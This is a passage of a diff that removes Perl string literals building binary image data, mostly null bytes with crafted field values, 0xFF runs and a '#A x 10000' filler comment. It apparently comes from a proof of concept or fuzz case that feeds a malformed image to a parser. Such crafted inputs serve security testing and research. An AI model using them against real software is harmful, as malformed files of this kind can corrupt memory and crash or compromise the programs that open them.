-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD9\x85\xCF\x51\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\xF7\x10\xF5\xAA\x89\x78\x20\x20\xD5\xF5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x76\x92\x4C\xF3\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x08\xF4".
-	        "\x55\xCA\x3C\x10\x10\xE4\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\xAF\x17\x83\xA2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\xD5\x93\xA6\x47\xE6\x17\x95\xC3\x00\x00\x00\x00\x00\x00\x00\x00\xBA\x00\x02\xC3\x1F\x71\xC6\x4C".
-	        "\xA7\x2D\x51\x74\x97\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1A\xC2\x33\x31".
-	        "\x13\x27\x3A\xD4\x00\x00\x00\x00\x00\x00\x00\x00\x4F\x00\xD6\x16\x76\xB5\x60\xE4\xA6\x22\xA6\x34\x8F\x12\x00\xFF\xFF\xFF\xFF\xFF".
-	        "\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x19\x01\x01\x00\x17\x00\x00\x00\x01\x00\x00\x00\x02\x00\x18\x00\x00\x00\x01\x00\x41\x31\x02\x00".
-	        "\x19\x00\x00\x00\x01\x00\x41\x32\x02\x00\x1A\x00\x00\x00\x01\x00\x41\x33\x02\x00\x1B\x00\x00\x00\x01\x00\x41\x34";
-                #A x 10000
-my $img_data3 = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x53\x88\x90\x42\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xE5\xF5\xF5\x00".
-	        "\x1A\x00\x00\x00\xF5\x00\x00\x00\xF7\x00\x10\x00\x00\x00\xF5\x00\x7E\xD5\xF7\x00\xE5\x00\x00\x00\xF5\x00\x7E\xD7\xF7\x00\xE7\x00".
-	        "\x00\x00\xF5\x00\x7E\x22\xF7\x00\x12\x00\x00\x00\xF5\x00\x7E\xD3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\xF5\x85\xAD\xC6\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\xFC\xF4\xF4\x00\x0D\x00\x00\x00\xF4\x00\x00\x00\xF5\x00".
-	        "\x08\x00\x00\x00\xF4\x00\x3F\xE4\xF5\x00\xFC\x00\x00\x00\xF4\x00\x3F\xE5\xF5\x00\xFD\x00\x00\x00\xF4\x00\x3F\x11\xF5\x00\x09\x00".
-	        "\x00\x00\xF4\x00\x3F\xE7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA6\x0D\x3D\x84\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x1F\x20\x60\x00\x8D\x00\x26\x98\xC6\x4C\xB5\xD4\xF4\x00\x1A\x00\x94\xBB\xB5\xD3\x51\x68\x92\x05\xE2\xA1".
-	        "\x9C\xCC\x46\xDB\x80\xB3\x13\x00\xBC\x00\x13\x00\xC8\x00\x5D\x00\x6C\x00\x83\x00\x10\x65\x9A\x77\x5F\x32\xAA\x16\x73\x00\x73\x00".
-	        "\xB6\xBA\x0E\x5D\x00\xE7\x12\x00\x10\x00\x05\x6C\x7D\x36\xE4\x5A\xE6\x47\x17\xEF\xC6\x18\x28\x32\x35\x82\x02\x00\x43\x00\xFE\x00".
-	        "\x3F\x00\xA9\x00\x77\x00\x7B\x00\x16\x90\x19\xA7\x8C\x21\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x20\x01\x01\x00".
-	        "\x00\x00\x00\x17\x00\x01\x00\x00\x02\x00\x00\x00\x00\x18\x00\x01\x41\x31\x02\x00\x00\x00\x00\x19\x00\x01\x41\x32\x02\x00\x00\x00".
-	        "\x00\x1A\x00\x01\x41\x33\x02\x00\x00\x00\x00\x1B\x00\x01\x41\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
